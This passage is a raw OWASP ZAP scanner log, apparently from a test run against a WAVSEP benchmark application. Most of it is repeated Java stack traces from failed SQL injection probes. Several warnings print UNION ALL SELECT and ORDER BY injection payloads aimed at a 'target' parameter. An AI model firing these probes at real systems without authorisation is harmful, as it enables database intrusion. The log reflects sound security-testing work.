org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681388 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681388 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681390 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681391 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681391 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681392 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681393 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 3076-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 3076-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681394 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681394 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681395 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681396 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681396 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 